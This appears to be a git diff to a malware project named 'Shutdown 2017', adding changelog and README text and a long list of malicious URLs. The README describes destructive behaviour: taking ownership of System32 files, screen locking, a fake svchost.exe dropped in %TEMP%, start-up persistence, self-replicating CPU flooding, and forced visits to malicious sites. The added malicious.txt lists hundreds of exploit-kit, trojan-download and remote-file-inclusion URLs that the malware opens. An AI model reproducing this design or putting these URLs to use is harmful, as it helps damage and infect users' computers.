diff --git a/CHANGELOG.md b/CHANGELOG.md index bf8277a..c60b58b 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,3 +1,17 @@ +1.5 (11/12/2017) + +- Major bug fixes to Shutdown 2017 +- Shutdown dependencies fixed. Can now be used by itself +- Silent and hidden payload executable added. +- Shutdown 2017 minor payload added +- Payloads automatically register for start-up. +- New executable now works as a virus flooder +- Builder library issues fixed +- Locker calibration fixed +- Malware will randomly send users to links (Adware capability - see malicious.txt) + +See ReadME for more details on update. + 1.4.1 (11/9/2017) - Icons added to programs diff --git a/README.md b/README.md index c183849..882e3a3 100644 --- a/README.md +++ b/README.md @@ -42,4 +42,26 @@ The scanning is where the damage is done. This software will go through every sy and clean system file. Meaning, whenever you try to run a file found inside of "Windows", it will run the .exe, however it will lock your screen meanwhile. For the sake of security and educational purposes, I set the password to simply "hi". If you want to change the password for whatever reason, you will need to recompile the code. -The scan also goes through your System32 and SysWOW64 folder. It will forcibly take ownership of your files. I have included the malware in a separate download. Run it at your own risk. +The scan also goes through your System32 and SysWOW64 folder. It will forcibly take ownership of your files. As of the 1.5 update (11/12/2017), Shutdown 2017 now unloads a new malware that installs +itself into the client's computer. Once Shutdown2017 runs, it will generate a fake svchost.exe file and run it. The assembly and memory size blends right in with the other svchost.exe processes. The +fake svchost is placed in %TEMP%. Due to the fact Shutdown2017 requires administrator permissions, the malware is treated as a child and will have full access to the client's computer, giving it the +opportunity to perform it's payloads. + +The moment the malware is opened, it install itself in Program Files and create a fake settings folder in your home documents folder. Then it will generate a fake executable with a silly name. The +list of .exe names can be found in fake_exe.h. The new executable becomes a duplicate of the malware and will also be run. This will end up creating a small loop, which will start to generate new +executables every 5-10 seconds. The flooding will start to hog up the client's CPU and slow down their computer tremendously. + +That's not all though. The malware can run 5 different payloads while it's running in the background. + +- Generate AHXRLocker.exe type files in the Shutdown2017 folder, being a pest. Even if you delete the folder, the process will continue to just generate new lockable files. +- Open a malicous url (malicious.txt). Like I said earlier, this program was just made for educational purposes. But obviously someone could easily replace the links with ads just to generate revenue. +- Duplicate itself and create another child +- Force flood the client +- Open up Shutdown2017 again (Another loop) +- [Fake lockdown screen](https://i.imgur.com/qBSlccZ.png) + +I can't find the location of where I downloaded the list of malicious URLs. If I find it, I'll update this. Regardless this whole Shutdown 2017 malware will destroy someone's computer either way. If +they are smart enough to close out the scanner via task manager, it still won't make a difference as there's already background work going on. The scanner will destroy your System files while +the background malware will unload it's payloads. + +I have included the malware in a separate download. Run it at your own risk. diff --git a/_build/BuilderLib.lib b/_build/BuilderLib.lib index 4643ff3..6e18c3e 100644 Binary files a/_build/BuilderLib.lib and b/_build/BuilderLib.lib differ diff --git a/_build/Protected.exe b/_build/Protected.exe new file mode 100644 index 0000000..bbbb810 Binary files /dev/null and b/_build/Protected.exe differ diff --git a/_build/malicious.txt b/_build/malicious.txt new file mode 100644 index 0000000..436bc7f --- /dev/null +++ b/_build/malicious.txt @@ -0,0 +1,2330 @@ +"2009/03/22_00:00","-","205.209.143.94/000f1.htm","-","Trojan","-","33314","0","US", +"2009/03/22_00:00","-","205.209.143.94/000f2.htm","-","Trojan","-","33314","0","US", +"2009/04/27_00:00","-","200.122.168.229/dl/goldvipclub/","-","trojan Casino","-","3790","0","CR", +"2009/04/27_00:00","-","200.122.168.229/dl/goldvipclub/TrackDownload.dll?DID=991392","-","trojan Casino","-","3790","0","CR", +"2009/05/08_00:00","diaryofagameaddict.com","208.76.80.16","ossus.tchmachines.com.","directs to exploits","Adrian Chua / adrian@fusion-studios.com","25767","0","US", +"2009/05/08_00:00","espdesign.com.au","64.49.219.215","-","directs to exploits","-","10532","0","US", +"2009/05/08_00:00","iamagameaddict.com","208.76.80.16","ossus.tchmachines.com.","directs to exploits","Adrian Chua / adrian@fusion-studios.com","25767","0","US", +"2009/05/08_00:00","kalantzis.net","208.83.210.33","box7.vistapages.com.","directs to exploits","John Kalantzis JOHN.KALANTZIS@VIDEOTRON.CA","13826","0","CA", +"2009/05/08_00:00","slightlyoffcenter.net","208.76.80.19","yavin.tchmachines.com.","directs to exploits","Jennifer Huang / jch1@cec.wustl.edu","25767","0","US", +"2009/05/08_00:00","toddscarwash.com","204.12.47.43","toddscarwash.com.","directs to exploits","david@lamicrochip.com","20021","0","US", +"2009/05/13_00:00","-","72.10.169.26/loader.exe","-","Cutwail/Pushdo","-","36666","0","CA", +"2009/05/13_00:00","tubemoviez.com","63.251.171.80","-","redirects to rogue","setraff@gmail.com","14744","0","US", +"2009/05/17_00:00","ipl.hk","77.232.66.18","77-232-66-18.static.servage.net.","redirects to exploits","IP PAK LUN ipl.hk@alan-ip.com","29671","0","DE", +"2009/05/18_00:00","-","85.13.236.154/v50/?v=66&s=I&uid=1824245000&p=13310&q=","85.13.236.154.reverse.coreix.net","Malware calls home","-","31708","0","GB", +"2009/05/18_00:00","crackspider.us/toolbar/install.php?pack=exe","85.159.233.47","-","Adware.Cracksearch.A","Varavva Brothers Ltd. / bestserials@mail.ru","43350","0","NL", +"2009/05/20_00:00","pos-kupang.com/","202.146.4.119","-","redirects to exploits","PT Timor Media Grafika / hansen_pah@yahoo.com","18365","0","ID", +"2009/05/20_00:00","rupor.info","62.149.12.191","rupor.info.","redirects to exploits","Viktor Tjutjun / support@rupor.info","15497","0","UA", +"2009/05/20_00:00","svision-online.de/mgfi/administrator/components/com_babackup/classes/fx29id1.txt","78.31.65.216","-","RFI","Juergen Voegeli / info@xantron.de","24961","0","DE", +"2009/05/22_00:00","officeon.ch.ma/office.js?google_ad_format=728x90_as","88.191.20.248","ns2.venez.net.","directs to Exploits","-","12322","0","FR", +"2009/05/22_00:00","sn-gzzx.com","222.76.215.12","-","Exploits","y113991122@yahoo.com.cn","4134","0","CN", +"2009/05/22_00:00","sunlux.net/company/about.html","211.234.100.137","-","directs to Exploits","-impala@nate.com","3786","0","KR", +"2009/05/23_00:00","-","219.148.34.9/dmdown/sss.exe","-","Trojan","-","17672","0","CN", +"2009/05/23_00:00","outporn.com","63.217.31.51","web-r1-h51.globecorp.net.","directs to sites with exploits","Long Mechies LLC / axel1230@gmail.com","3491","0","US", +"2009/05/23_00:00","timothycopus.aimoo.com","74.52.179.179","b3.b3.344a.static.theplanet.com.","directs to trojan","WhoisGuard / 2cb93a446cab4816bf9b3dbf18d9b3c2.protect@whoisguard.com","21844","0","US", +"2009/05/23_00:00","xindalawyer.com","218.5.79.63","-","Exploits","jimmy@hn12345.com","4134","0","CN", +"2009/05/24_00:00","freeserials.spb.ru/key/68703.htm","91.195.110.99","91-195-110-99.hmrtelecom.ru.","TDSS","-","43671","0","RU", +"2009/05/26_00:00","deletespyware-adware.com","174.120.200.218","da.c8.78ae.static.theplanet.com.","Fake Antivirus","office@deletespyware-adware.com","21844","0","US", +"2009/05/26_00:00","orbowlada.strefa.pl/text396.htm","217.74.66.183","www.strefa.pl.","Directs to rogue","-","16138","0","PL", +"2009/05/28_00:00","ruiyangcn.com","61.139.126.15","-","directs to exploits","inicn@126.com","4134","0","CN", +"2009/05/28_00:00","zkic.com","174.37.172.162","www.se.parahost.com.","directs to exploits","zhirong yang cdyzr@yahoo.com.cn","36351","0","US", +"2009/05/31_00:00","adserving.favorit-network.com/eas?camp=19320;cre=mu&grpid=1738&tag_id=618&nums=FGApbjFAAA","91.209.163.184","vemw04.c76.fvtn.net.","-","2ffba9ee4ff19e8587163b873c03ff22-913471@contact.gandi.net","48445","0","EU", +"2009/05/31_00:00","cracks.vg/d1.php","111.92.237.115","server111092237115.i-services.com.hk.","Directs to rogue","-","45816","0","HK", +"2009/06/03_00:00","-","63.227.18.137/id5.txt","mail.vail-valley.com","RFI","-","209","0","US", +"2009/06/03_00:00","juicypussyclips.com","74.81.93.72","ip72.envelopebizs.com.","Directs to sites with exploits","Niels Musschoot / adolf.web@gmail.com","27413","0","US", +"2009/06/04_00:00","-","202.91.74.136/bjp3/id3.txt","-","RFI","-","9830","0","IN", +"2009/06/05_00:00","nuptialimages.com","64.6.241.22","s22.n241.n6.n64.static.myhostcenter.com.","directs to exploits","NEDHORN@COMCAST.NET","11343","0","US", +"2009/06/07_00:00","bezproudoff.cz","93.185.104.30","www20.pipni.cz.","directs to exploits","-","43541","0","CZ", +"2009/06/07_00:00","ceskarepublika.net","93.185.104.27","www17.pipni.cz.","directs to exploits","pvachtl@quick.cz","43541","0","CZ", +"2009/06/07_00:00","hotspot.cz","93.185.104.30","www20.pipni.cz.","directs to exploits","Simon Zaruba / simzaruba@seznam.cz","43541","0","CZ", +"2014/04/02_08:53","www.gmcjjh.org/DHL","198.252.70.200","stats.green.mysitehosted.com.","Document.zip Trojan.Kryptic","Somnath gmjjh / rexinfosolution@gmail.com","36351","0","US", +"2009/06/07_00:00","nerez-schodiste-zabradli.com","93.185.104.29","www19.pipni.cz.","directs to exploits","Petr Danek - Danek a Danek / danek-danek@volny.cz","43541","0","CZ", +"2009/06/07_00:00","nordiccountry.cz","93.185.104.28","www18.pipni.cz.","directs to exploits","-","43541","0","CZ", +"2009/06/07_00:00","nowina.info","93.185.104.30","www20.pipni.cz.","directs to exploits","Gregor Stopa / gstopa@volny.cz","43541","0","CZ", +"2009/06/07_00:00","obada-konstruktiwa.org","81.2.194.138","c138un.forpsi.com.","directs to exploits","Milos Brejcha Milos Brejcha / milos@kbj.cz","24806","0","CZ", +"2009/06/07_00:00","otylkaaotesanek.cz","81.2.195.176","d176ud.forpsi.com.","directs to exploits","-","24806","0","CZ", +"2009/06/07_00:00","pb-webdesign.net","93.185.104.29","www19.pipni.cz.","directs to exploits","Petr Beran Beran / dom-reg-joker@ignum.cz","43541","0","CZ", +"2009/06/07_00:00","pension-helene.cz","81.2.195.176","d176ud.forpsi.com.","directs to exploits","helene@tiscali.cz","24806","0","CZ", +"2009/06/07_00:00","podzemi.myotis.info","93.185.104.29","www19.pipni.cz.","directs to exploits","Ladislav Mikes / la.mi@volny.cz","43541","0","CZ", +"2009/06/07_00:00","smrcek.com","93.185.104.29","www19.pipni.cz.","directs to exploits","Pavel Jedlicka / dom-reg-joker@ignum.cz","43541","0","CZ", +"2009/06/07_00:00","spekband.com","93.185.104.30","www20.pipni.cz.","directs to exploits","Michal Gancarcik / michalgancarcik@seznam.cz","43541","0","CZ", +"2014/04/11_11:48","m2132.ehgaugysd.net/zyso.cgi?18","66.96.223.209","-","leads to exploit kit","Registrar Abuse Contact abuse@web.com","21788","0","US", +"2009/06/07_00:00","webcom-software.ws/links/?153646e8b0a88","64.70.19.33","mailrelay.33.website.ws.","exploits","Aleksandr A Kainov / kainovalex@mail.ru","3561","0","US", +"2009/06/07_00:00","worldgymperu.com","74.54.143.242","impulse.websitewelcome.com.","directs to exploits","pp75@mixmail.com","21844","0","US", +"2009/06/07_00:00","zgsysz.com","125.65.112.23","-","directs to exploits","lans-1126@163.com","4134","0","CN", +"2009/06/08_00:00","oknarai.ru","66.118.146.69","66-118-146-69.static.sagonet.net.","directs to exploits","gray@rostov.ru","21840","0","US", +"2009/06/10_00:00","www.realinnovation.com/css/menu.js","67.202.87.234","ip234.67-202-87.static.steadfast.net.","redirects to exploits","REALINNOVATION.COM@domainservice.com","32748","0","US", +"2009/06/12_00:00","hardcorepornparty.com","88.214.193.196","-","directs to exploits","DMITRI KUZNETSOV / wm@beach-book.com","46636","0","GB", +"2009/06/12_00:00","zous.szm.sk","88.86.113.4","freehosting.szm.com.","directs to exploits","-","39392","0","CZ", +"2009/06/13_00:00","noveslovo.com","77.222.131.86","86.0-127.131.222.77.in-addr.arpa.","directs to exploits","-","21219","0","UA", +"2009/06/14_00:00","dimsnetwork.com","88.214.193.196","-","Directs to exploits","Dmitri Kuznetsov / wm@beach-book.com","46636","0","GB", +"2009/06/14_00:00","luckyblank.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / e09201274974449886ada169b50d5879.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckyclean.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / 7e0c10ad0bb648489573b22a28f86594.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckyclear.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / 1ad83c2f5960476583b10b7bf18fbccf.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckyeffect.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / f974291e6c834cb58b61da35ee0a825c.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckyhalo.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / 5ef888c31e574ee39bec8149621cbd2b.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckypure.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / befe020f9cc8404d8696e8f255d0eadc.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckyshine.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / a45a009dbed24caf8d5c337e097c367b.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckysuccess.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / 92f381eb474e400f91bbe7a831dc9e82.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckysure.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / e292ee43d78142ada7bc024ac5f0fed7.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","luckytidy.info","89.185.228.15","ex14.exmasters.com.","directs to rogue","WhoisGuard Protected / 1ae7e16139f64a14a63beedbc44bd4bf.protect@whoisguard.com","24971","0","CZ", +"2009/06/14_00:00","nudebeachgalleries.net","88.214.242.12","-","directs to exploits","Dmitri Kuznetsov / wm@beach-book.com","46636","0","GB", +"2009/06/15_00:00","buffalogoesout.com","66.96.146.201","201.146.96.66.static.eigbox.net.","directs to exploits","Addnet / brianw@addnetinc.com","29873","0","US", +"2009/06/16_00:00","-","213.174.143.196/v/g.php?d=79","-","directs to rogue","-","39572","0","UA", +"2009/06/16_00:00","achren.org","83.245.63.229","http.sodium.lon.periodicnetwork.com.","directs to exploits","Andrew Clancy / nite@achren.org","33970","0","GB", +"2014/03/31_11:44","-","5.135.43.43/adm/documentos.zip","-","Trojan.Banker","-","16276","0","FR", +"2014/03/31_11:44","-","185.12.14.208/tmp/Boleto_Vencido.zip","-","Trojan.Banker","-","50673","0","NL", +"2009/06/16_00:00","associatesexports.com","209.25.133.107","altar14.supremepanel14.com.","directs to exploits","Muhammed Ishaaq / ezee2contact@gmail.com","11388","0","US", +"2014/04/07_18:32","-","193.218.144.3/cp/login/","-","Gozi control panel","-","197252","0","UA", +"2009/06/18_00:00","-","69.3.109.79/1.html","h-69-3-109-79-static.nycmny83.covad.net","Exploits","-","18566","0","US", +"2009/06/18_00:00","antalya.ru/links/","89.111.176.89","fe31-1.hc.ru.","directs to exploits","pro234@yandex.ru","41126","0","RU", +"2009/06/18_00:00","conds.ru","90.156.201.22","fe.shared.masterhost.ru.","directs to exploits","lasic@mail.ru","25532","0","RU", +"2014/04/06_04:49","img001.com/business/qiji.exe","36.250.3.247","-","Trojan.Spy","Registrar Abuse Contact Email:supervision@xinnet.com","4837","0","CN", +"2009/06/20_00:00","unalbilgisayar.com","84.51.21.163","host-84-51-21-163.teletektelekom.com.","directs to exploits","admin@unalbilgisayar.com","34104","0","TR", +"2009/06/24_00:00","www.t-sb.net","72.232.219.152","152.219.232.72.static.reverse.ltdomains.com.","directs to exploits","Norets Mihail Vitalevich / nmihey@gmail.com","22576","0","US", +"2009/06/25_00:00","hanulsms.com","124.217.216.40","-","directs to exploits","zzigger@naver.com","38661","0","KR", +"2009/06/25_00:00","semengineers.com","216.245.193.34","thor.corpservers.net.","directs to exploits","hostmaster@inspediumhosting.com","46475","0","US", +"2009/06/25_00:00","srslogisticts.com","64.191.16.37","reseller4.hostingmadeeasy.com.","directs to exploits","Green Shark Green Shark / younisrajput@hotmail.com","21788","0","US", +"2009/06/25_00:00","tendersource.com","75.125.56.218","218.56.125.75.in-addr.ev1.opticaljungle.com.","directs to exploits","Domain Admin / contact@privacyprotect.org","21844","0","US", +"2009/06/25_00:00","traff1.com/in.cgi?5","66.232.116.49","-","directs to trojan","SergeyGolushko / SERGEY_GOLUSHKO@YAHOO.COM","29802","0","US", +"2009/06/25_00:00","web-olymp.ru","81.176.232.104","server4.neoweb.ru.","directs to exploits","web-webolymp@yandex.ru","8342","0","RU", +"2014/04/06_04:49","oprahsearch.com/scripts/net19.exe","192.249.59.79","-","Trojan.Inject","Aaron Polmeer / domains@searchexperiences.com","3842","0","US", +"2014/04/06_04:49","oprahsearch.com/scripts/brez251.exe","192.249.59.79","-","-","Aaron Polmeer / domains@searchexperiences.com","3842","0","US", +"2014/04/02_17:58","rl8vd.kikul.com/ci7ka5t2ue","173.212.223.250","ooo.177ok.ru.","exploit kit","Registrar Abuse Contact abuse@web.com","21788","0","US", +"2009/06/28_00:00","sbnc.hak.su/spread.txt","91.189.81.71","www2.wen.ru.","RFI","wapplanet@mail.ru","8342","0","RU", +"2009/06/28_00:00","somnoy.com","91.197.128.216","h6.data-xata.net.","directs to exploits","Kostya B Zubar / cony@ukr.net","8870","0","UA", +"2014/04/02_08:53","incoctel.cl/8RHFBgK4.php?html=27","190.114.252.75","server0126-0711.dnsmisitio.net.","Drive-by","-","52368","0","CL", +"2014/04/02_08:53","incoctel.cl/8RHFBgK4.php?id=23694557","190.114.252.75","server0126-0711.dnsmisitio.net.","Drive-by","-","52368","0","CL", +"2009/06/29_00:00","nadegda-95.ru","87.242.126.153","ant6.fast.ru.","directs to exploits","nadegda-95@mail.ru","25532","0","RU", +"2009/06/29_00:00","romsigmed.ro","86.35.15.214","www4.linux.romtelecom.net.","directs to exploits","-","9050","0","RO", +"2009/06/29_00:00","spatsz.com","67.210.126.110","orion.lunarpages.com.","directs to exploits","kasproduct@wanadoo.fr","15244","0","US", +"2009/06/29_00:00","svetyivanrilski.com","212.36.9.1","ns5.tophostbg.net.","directs to exploits","Stilian Nikolov / st.nikolov@gmail.com","39388","0","BG", +"2009/06/29_00:00","titon.info","212.36.9.10","ns1.tophostbg.net.","directs to exploits","Tania Terzieva / tania_terzieva@abv.bg","39388","0","BG", +"2009/06/29_00:00","tophostbg.net","212.36.9.10","ns1.tophostbg.net.","directs to exploits","Georgi Chakarov / info@tophost.bg","39388","0","BG", +"2009/06/29_00:00","vivaweb.org","212.36.9.1","ns5.tophostbg.net.","directs to exploits","Georgi Zhulkov / zhulkov@gmail.com","39388","0","BG", +"2009/06/29_00:00","vocational-training.us","216.8.179.24","ptr-216-8-179-24.ptr.nextdimensioninc.com.","directs to exploits","webmaster@okcontentweb.com","13727","0","CA", +"2009/06/29_00:00","warco.pl","81.2.200.162","host-81-2-200-162.alpha.pl.","directs to exploits","warco.pl","24806","0","CZ", +"2009/06/30_00:00","bde.be","194.146.224.100","cluster.sivit.org.","directs to exploits","administration@piezo-forte.be","13193","0","FR", +"2009/06/30_00:00","pwvita.pl","77.55.70.169","acs169.rev.netart.pl.","directs to exploits","-","15967","0","PL", +"2009/06/30_00:00","roks.ua","80.91.176.135","uahost01.hc.ua.","directs to exploits","roks@name.biz.ua","21219","0","UA", +"2009/06/30_00:00","skgroup.kiev.ua","80.91.176.135","uahost01.hc.ua.","directs to exploits","hostmaster@kiev.ua","21219","0","UA", +"2009/06/30_00:00","tecnocuer.com","190.228.29.81","mx2981.godns.net.","directs to exploits","Domain Discreet / 1bedb6390a1411500163a946ac9b2fea@domaindiscreet.com","7303","0","AR", +"2009/06/30_00:00","tk-gregoric.si","91.185.202.90","mail.internetstoritve.com.","directs to exploits","turisticna.kmetija.gregoric@siol.net","41828","0","SI", +"2009/06/30_00:00","tomalinoalambres.com.ar","190.228.29.81","mx2981.godns.net.","directs to exploits","-","7303","0","AR", +"2009/06/30_00:00","vipdn123.blackapplehost.com","69.162.86.4","4-86-162-69.static.reverse.lstn.net.","vbscript downloader","dns@iversit.com","46475","0","US", +"2009/06/30_00:00","womenslabour.org","83.142.47.61","www.linux.webserwer.pl.","directs to exploits","rogoz@firma.hoga.pl","39168","0","PL", +"2009/06/30_00:00","wroclawski.com.pl","83.142.47.61","www.linux.webserwer.pl.","directs to exploits","-","39168","0","PL", +"2009/07/01_00:00","xoomer.alice.it/email02/bom.jpg","62.211.68.12","-","trojan","-","20580","0","IT", +"2009/07/11_00:00","www.propan.ru/forum/downloads.php","89.111.177.27","fe91-1.hc.ru.","RFI","admin@propan.ru","41126","0","RU", +"2009/07/21_00:00","firehouse651.com/gallery/images/copyright.txt","64.40.123.35","mercury.van-dns.com.","RFI","FireHouse651.COM / sales@superwebhost.com","14280","0","CA", +"2009/07/21_00:00","www.freewebtown.com/atakus/Nokia/BotNetNew.txt","208.75.230.43","www.freewebtown.com.","RFI","Tulip Systems / abuse@tulix.com","36820","0","US", +"2009/07/21_00:00","webcashmaker.com/v2/members/trade_traffic.php","74.206.224.180","-","RFI","Domains by Proxy, Inc. / WEBCASHMAKER.COM@domainsbyproxy.com","27257","0","US", +"2009/07/21_00:00","spykit.110mb.com/tools/id.txt","70.38.113.158","ip-70-38-113-158.static.privatedns.com.","RFI","110mb.server@gmail.com","32613","0","CA", +"2009/07/21_00:00","sentrol.cl/components/kampret.jpg","74.200.91.144","unknown144.91.200.74.defenderhosting.com.","RFI","-","14383","0","US", +"2009/07/21_00:00","www.kjbbc.net/bbs/data/gallery/1207290228/inbox.txt","112.216.25.75","-","RFI","Ho Sung Kim / thebible1611@hanmail.net","3786","0","KR", +"2009/07/21_00:00","www.torgi.kz/help/id2.txt","212.154.208.169","-","RFI","-","9198","0","KZ", +"2009/07/21_00:00","www.torgi.kz/help/idxx.txt","212.154.208.169","-","RFI","-","9198","0","KZ", +"2009/07/21_00:00","www.uriyuri.com/bbs/skin/zero_vote/1.txt","202.131.25.49","-","RFI","Chae Yu ri / freen@introcom.net","23576","0","KR", +"2009/07/21_00:00","www.usaenterprise.com/images/images.txt","212.70.224.183","virtweb-cms.nethouse.it.","RFI","usa enterprise / usainfo@virgilio.it","16141","0","IT", +"2009/07/21_00:00","www.wigglewoo.com/portfolio/contests/contest-006.png","85.13.136.149","dd15308.kasserver.com.","RFI","owner-tjana.habermann@gmx.net","34788","0","DE", +"2009/07/21_00:00","xorgwebs.webs.com/stx.1","216.52.115.50","membersite.webs.com.","RFI","FREEWEBS, INC / inquiries@webs.com","10913","0","US", +"2009/07/21_00:00","plengeh.wen.ru/id.txt","91.189.80.71","www.wen.ru.","RFI","wapplanet@mail.ru","8342","0","RU", +"2009/07/21_00:00","wahyufian.zoomshare.com/files/bot.txt","64.94.37.195","frontend.zoomshare.com.","RFI","DW Data, Inc. / totalweblevel2@digitalwork.com","19024","0","US", +"2009/07/24_00:00","www.hospedar.xpg.com.br/nome.txt","200.149.77.224","-","RFI","Contato WFG / registro@webforce.com.br","7738","0","BR", +"2009/08/03_00:00","dl.heima8.com/pv/dl.htm?adid=20132&sid=0211","58.215.240.96","-","-","HuYangFeng Info Tech Co.,Ltd. / whs@yiclick.com","4134","0","CN", +"2009/08/05_00:00","update.51edm.net/20090728/01.dll","222.222.204.68","-","trojan","ktone123@sohu.com","4134","0","CN", +"2009/08/05_00:00","update.51edm.net/20090728/01.kdg","222.222.204.67","-","trojan","ktone123@sohu.com","4134","0","CN", +"2009/08/05_00:00","www.xiruz.kit.net/mola.jpg","201.7.184.2","-","trojan","GLOBO Comunicacao e Participacoes S.A. / fapesp@corp.globo.com","28604","0","BR", +"2009/08/12_00:00","wfoto.front.ru/fotos.com","194.186.88.45","ftp.front.ru.","trojan Banload","hosting@hc.ru","3216","0","RU", +"2009/08/12_00:00","ska.energia.cz/download/imer.up","217.31.49.10","kojak.core.ignum.cz.","trojan Bancos","Libor Balek / energia@opava.cz","29134","0","CZ", +"2009/08/15_00:00","www.obyz.de/webproxytest.txt","85.13.138.226","dd18438.kasserver.com.","RFI","Daniel Hochheimer / info@all-inkl.com","34788","0","DE", +"2009/08/17_00:00","callingcardsinstantly.com/webalizer/050709wareza/crack=17=keygen=serial.html","216.157.140.193","hsphere.cc.","directs to exploits","BuzzyPlanet,Inc. / agent@buzzyplanet.com","16557","0","US", +"2009/08/17_00:00","dawnframing.com/webalizer/050709wareza/crack=17=keygen=serial.html","216.81.64.192","rapidcolo.com.","directs to exploits","Dawn Framing Inc. / rdsantos@cystemlink.com","16557","0","US", +"2009/08/17_00:00","free-crochet-pattern.com/webalizer/050709wareza/crack=17=keygen=serial.html","216.157.140.192","hsphere.cc.","directs to exploits","Buzzy Planet, Inc. / agent@buzzyplanet.com","16557","0","US", +"2009/08/17_00:00","-","199.238.181.161/setup.exe","-","Rogue","-","2914","0","US", +"2009/08/25_00:00","js.tongji.linezing.com/1189582/tongji.js","119.42.225.167","lvs1.bmvip.cnz.alimama.com.","directs to exploits","Le Guo larrykwo@yahoo.com","37963","0","CN", +"2009/08/30_00:00","www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_180836f9b956ab9d91a50f9add968699","188.64.184.32","bluechip3.ukhost4u.com.","-","domain-admin@easily.co.uk","47625","0","GB", +"2009/09/05_00:00","adgallery.whitehousedrugpolicy.gov/members/Miley-Cyrus-Nude/default.aspx","198.77.71.192","adgallery.whitehousedrugpolicy.gov.","directs to trojan","abuse@noc.privatedns.com","3356","0","US", +"2009/09/11_00:00","-","213.163.89.54/lib/index.php?t=2","-","redirects to exploit kit","-","20495","0","NL", +"2009/09/11_00:00","www.vvvic.com","118.220.175.24","-","obfuscated iframe directs to exploits","jini lee / jini6708@hanmail.net","9318","0","KR", +"2009/09/12_00:00","sportsulsan.co.kr/poll/aipi/id.txt","211.171.231.215","sportsulsan.co.kr.","RFI","sportsulsan@hanmail.net","3786","0","KR", +"2009/09/13_00:00","-","66.96.214.117:8080","6696214117.hostnoc.net","compromised server with nginx at port 8080","-","21788","0","US", +"2009/09/13_00:00","-","84.242.167.49:8080","www.sopharma.bg","compromised server with nginx at port 8080","-","8672","0","BG", +"2009/09/13_00:00","hst-19-33.splius.lt:8080","77.79.19.33","hst-19-33.splius.lt.","compromised server with nginx at port 8080","hostmaster@domreg.lt","25406","0","LT", +"2009/09/13_00:00","tabex.sopharma.bg:8080","84.242.167.49","www.sopharma.bg.","compromised server with nginx at port 8080","-","8672","0","BG", +"2009/09/13_00:00","-","209.9.188.130/t.txt","-","RFI","-","3491","0","US", +"2009/09/16_00:00","www.professionalblackbook.com/","96.30.28.181","host.disantolaw.com.","obfuscated iframe directs to exploits","The Corporate and Real Estate Law Group, P.L. / bethdesanto@yahoo.com","19066","0","US", +"2009/09/18_00:00","0koryu0.easter.ne.jp","208.71.106.216","super-html-7.fc2.com.","obfuscated iframe directs to LuckySploit","-","40263","0","US", +"2009/09/19_00:00","www.whitesports.co.kr","211.202.2.17","web-7.blueweb.co.kr.","iframe directs to LuckySploit","yoon1092@hotmail.com","9318","0","KR", +"2009/09/23_00:00","-","213.163.89.54/mito/","-","redirects to exploit kit","-","20495","0","NL", +"2009/09/24_00:00","typeofmarijuana.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","trafficgrowth.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","thcvaporizer.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","roorbong.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","thcextractor.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","purethc.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","wHd9hT@privacypost.com","23352","0","US", +"2009/09/24_00:00","potvaporizer.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","portablevaporizer.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","cannabispicture.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/24_00:00","cannabislyric.com/","204.93.171.26","web01.snaago.com.","obfuscated script directs to exploits","WF / mark@tig.eu","23352","0","US", +"2009/09/26_00:00","dp-medien.eu","81.169.145.69","w05.rzone.de.","compromised site directs to exploits","hostmaster@cronon-isp.net","6724","0","DE", +"2009/09/26_00:00","juedische-kammerphilharmonie.de","85.13.135.179","dd14202.kasserver.com.","compromised site directs to exploits","-","34788","0","DE", +"2009/09/26_00:00","vernoblisk.com","67.228.85.201","hostica.com.","compromised site directs to exploits","Vern Oblisk Bail Bonds / voblisk@tampabay.rr.com","36351","0","US", +"2009/09/26_00:00","vural-electronic.com","81.169.145.82","w82.rzone.de.","compromised site directs to exploits","Ayhan Vural / ayhanv@gmx.de","6724","0","DE", +"2009/11/01_18:49","-","217.23.6.17:10283/d3n2829231.dat","-","malware calls home","-","15435","0","NL", +"2009/11/13_20:52","-","200.80.97.174/maravilha.txt","multilink-97-174.ipAddr.multilink-ht.net.","RFI","-","27767","0","HT", +"2009/11/15_16:09","www.purplehorses.net/?page=bleach-244-online","69.89.19.200","19-200.bluehost.com.","redirects to Rogue if referer is a search engine","whois@bluehost.com","11798","0","US", 